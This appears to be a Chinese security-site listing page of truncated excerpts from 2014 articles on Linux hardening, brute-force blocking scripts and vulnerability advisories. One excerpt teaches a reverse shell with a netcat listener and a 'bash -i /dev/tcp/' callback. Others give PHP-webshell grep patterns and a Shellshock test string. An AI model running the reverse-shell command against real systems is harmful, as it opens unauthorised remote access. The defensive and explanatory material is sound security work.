虽然SSH的设计目的在于安全访问,但它有的功能确实为入侵敞开了大门。不过只要稍作修改,Linux管理员就可以让sshd更加安全。 多数Linux服务器在默认下通过SSH运行Secure Shell Daemon (sshd)进程以便进行远程访问。Linuxsshd是一种简单的方式,允许远程用...
【Reverse shell】也叫反弹shell,是渗透攻击的基本功,如果你找到机会让远端的机器执行你注入的代码,你的代码怎样才能为你生成一个可以交互操作的shell呢? 你可以在本地先用nc启动一个监听进程【nc -l 端口号】 然后在远端执行【bash -i /dev/tcp/你本地的...
发布日期:2014-11-07 更新日期:2014-11-18 受影响系统: IBM DB2 9.x IBM DB2 10.x 描述: BUGTRAQ ID: 71006 CVE(CAN) ID: CVE-2014-6159 IBM DB2是一个大型的商业关系数据库系统。 IBM DB2 9.7-FP10、9.8-FP5、10.5-FP4(Linux, UNIX, Windows)在启用...
发布日期:2014-11-05 更新日期:2014-11-18 受影响系统: cURL cURL 7.17.1-7.38.0 描述: BUGTRAQ ID: 70988 CVE(CAN) ID: CVE-2014-3707 cURL/libcURL是命令行传输文件工具,支持FTP、FTPS、HTTP、HTTPS、GOPHER、TELNET、DICT、FILE和LDAP。 cURL/libcU...
1 可以得出filename正在运行的进程 #pidof filename 2 可以通过文件或者tcp udp协议看到进程 #fuser -n tcp port 3 可以看文件修改时间,大小等信息 #stat filename 4 看加载模块 #lsmod 5 看rpc服务开放 #rpcinfo -p 6 看网卡是否混杂模式(promiscuous mod)...
我的一台公网服务器,由于网站采取的是双备份策略,所以开放了vsftpd的21端口,近来发现许多人在尝试暴力破解vsftpd和ssh,我随便看了看/var/log/secure日志,显示如下: 118.33.110.52=2834 119.145.254.77=37 121.254.179.199=226 121.88.250.243=35 200.29...
功能:查询一分钟前secure文件,统计访问失败的IP和次数,并把在1分钟内失败5次的IP列入危险susperctip,1分钟内失败10次直接丢给防火墙拦截,并记录在blockip,关于关键词可以根据需求加强下 #!/bin/bash ##Filteringscript ##CreateTime:2012-10-12.17 # t...
从余大神那要过来的ssh和vsftpd防暴力破解脚本,不知道为什么复制51cto blog上的脚本老是报-gt错误,所以在自己blog上共享给需要的人. view source print? 01 #!/bin/bash 02 #Denyhosts For vsftpd and sshd 03 #2012-12-04 04 awk {for(i=1;i=NF;i++){if($i ~...
我的Nagios外网监控服务器,刚开始测试时取的密码是redhat,放进公网一天就被人改了,郁闷死了;另外的几台公网机器(没有硬件防火墙),被人不停的ssh连接,我稍为判断了一下,其中有个IP居然连接失败17000次了;后来环境部署成熟以后发现仍然有不少外网ip在扫...
我在检查一台CentOS 5.5服务器的安全环境时,发现很多IP在恶意扫描此服务器的端口。本来想部署snort防入侵环境的,后来发现snort环境部署非常复杂,而以上的恶意扫描完全可以用PortSentry来实现。PortSentry是入侵检测工具中配置最简单、效果最直接的工具之...
0x00简介 1 说起clickjacking,很多人其实都不知道是干嘛的。比起XSS来说,clickjacking显得比较神秘,乌云漏洞库里面的相关的漏洞也不到10条而已。 2 瞌睡龙之前发过一篇clickjacking的技术文档,主要是介绍clickjacking出现的原因,以及防御的方法。我这里...
一句话查找PHP木马 # find ./ -name *.php |xargs egrep phpspy|c99sh|milw0rm|eval\(gunerpress|eval\(base64_decoolcode|spider_bc /tmp/php.txt # grep -r --include=*.php [^a-z]eval($_POST . /tmp/eval.txt # grep -r --include=*.php file_put_conten...
开源CMS项目Drupal对最近修复的SQL注入漏洞发布了安全警告,如果没有在安全修正发布7小时内打上补丁,那么使用Drupal 7的网站可以假定他们已经遭到了攻击者入侵。自动攻击工具已能利用漏洞去控制网站。 这里的及时是指在发布补丁7小时内,Drupal是在10月15日...
CVE-2014-7818 影响使用了 config.serve_static_assets = true 的 Rails 应用,而 Gitlab 中这个配置值为 false,配置文件位于config/environments/production.rb中,因为静态文件直接由 Nginx 或者 Apache 处理。...
在Linux和Unix系统中广泛使用的开源应用wget发现了一个 严重安全漏洞 ,允许攻击者通过FTP创建任意文件和目录,甚至复写整个文件系统。 该漏洞 是Rapid 7的首席研究官HD Moore 最早报告 给 GNU Wget项目的。不同于此前广泛宣传的Heartbleed,ShellShock,POO...
在Linux和Unix系统中广泛使用的开源应用wget发现了一个严重安全漏洞,允许攻击者通过FTP创建任意文件和目录,甚至复写整个文件系统。该漏洞是Rapid 7的首席研究官HD Moore最早报告给 GNU Wget项目的。 不同于此前广泛宣传的Heartbleed,ShellShock,POODLE...
CISCO设备默认密码是明文显示,存在于配置文件中 但出于安全考虑,可以将密码设置为暗文显示 增加如下配置 service password-encryption 此后,密码相关的配置会按如下显示 enable password 7 095C4F1A0A1218000FBRusername user password 7 12090404011C031...
10月28日,一份公开的邮件中曝出FTP远程执行命令漏洞,漏洞影响到的Linux系统包括:Fedora, Debian, NetBSD, FreeBSD, OpenBSD, 甚至影响到了苹果的OS X操作系统的最新版本Yosemite 10.10。 NetBSD的一位开发人员(Jared McNeill)证实了这个漏洞可已通过tnftp...
在一个典型的Linux系统中,至少有两个目录或分区保持着临时文件。其中之一是/tmp目录,再者是/var/tmp。在更新的Linux内核的系统中,还可能有/dev/shm,它是用tmpfs文件系统装载的。 存储临时文件的目录存在着一个问题,即这些目录可以成为损害系统安全的僵尸...
攻击者正利用上个月披露的Shellshock漏洞入侵邮件服务器建立僵尸网络。 安全研究人员报告,攻击者向邮件服务器发送特定的消息头字段,诱骗服务器执行一个 Perl脚本,成为僵尸网络的一部分。邮件消息头的构成是: Shellshock spam October 2014 (IP地址已隐...
1. 版本 CentOS-6.5-x86_64-minimal-freewaf-1.2.2-release(31806) ubuntu-12.04-server-i386-freewaf-1.2.2-release(31806) ubuntu-12.04-server-amd64-freewaf-1.2.2-release(31806) 2. 防护引擎和网管更新 对配置文件一些敏感信息进行加密存储; 修改了防...
Wget CVE-2014-4877:FTP 符号链接任意文件系统访问 Wget 爆出 CVE-2014-4877 漏洞:FTP 符号链接任意文件系统访问。 Package: wget Version: 1.15-1 Severity: important Upstream fix: http://git.savannah.gnu.org/cgit/wget.git/commit/?id=18b0979357ed...
用户账号是计算机使用者的身份凭证或标识,每一个要访问系统资源的人,必须凭借他的用户账号才能进入计算机。在Linux系统中,提供了多种机制来确保用户账号的正当、安全使用。合理地规划用户账号,并合理地分配权限,是保证Linux系统安全的第一步。 1. 清理...
随着每一个新版本的推出,Claws Mail 将会越来越好。 Claws Mail 发起于Linux 社区,是一款快速、简单易用,并且充满了很多有趣的特性的开源邮件客户端。开发者们推送了一次大的更新和升级,建议使用者进行升级。 有些人可能不知道这个邮件客户端,但Claws M...
手工开一个VPS,用将Centos 模板来运行后,设置好IP可以访问后,运行以下命令来更新: yum update bash -y 也可以参考 http://tanxw.blog.51cto.com/4309543/1558029...
2014年9月24日,一位名叫斯特凡沙泽拉的安全研究者发现了一个名为破壳(Shellshock,也称为bash门或Bash漏洞)的bash漏洞。该漏洞如果被渗透,远程攻击者就可以在调用shell前通过在特别精心编制的环境中输出函数定义执行任何程序代码。然后,这些函数内的代...
nfs全称Network File System,即网络文件系统。 第一步:安装nfs服务端 sudo apt-get install nfs-kernel-server 第二步:创建目录 创建需要作为nfs的目录,例如mkdir -p /var/nfs 。 修改/var/nfs目录的权限为nobody,chown -R nobody:nobody /var/nfs 。...
最近网上闹的比较火的一个安全问题就是bash漏洞,因为这个漏洞影响的系统范围比较大,所以严重程度堪比年初heartbleed bug漏洞。 废话不多说,接下来根据博主的几台服务器来做演示。 检查是否有漏洞,命令如: env VAR=() { :;}; echo Bash is vulnerable! b...
幽灵漏洞是Linux glibc库上出现的一个严重的安全问题,他可以让攻击者在不了解系统的...
只需要一次次敲下退格键就够了! BACKSPACE 两位西班牙的安全研究人员发现了Linux 的...
大家都认为 Linux 默认是安全的,我大体是认可的 (这是个有争议的话题)。Linux默认确...
GNU C库(Glibc)是GNU系统的三大基础组件(Linux内核,GCC编译器,GLIBC库),一个名为...
#!/bin/shcd /var/log/httpd/cat access_log|awk {print $1}|sort|uniq -c|sort -n -r...
安装 yuminstall iptables 清除已有iptables规则 iptables-F iptables-X iptables-Z ...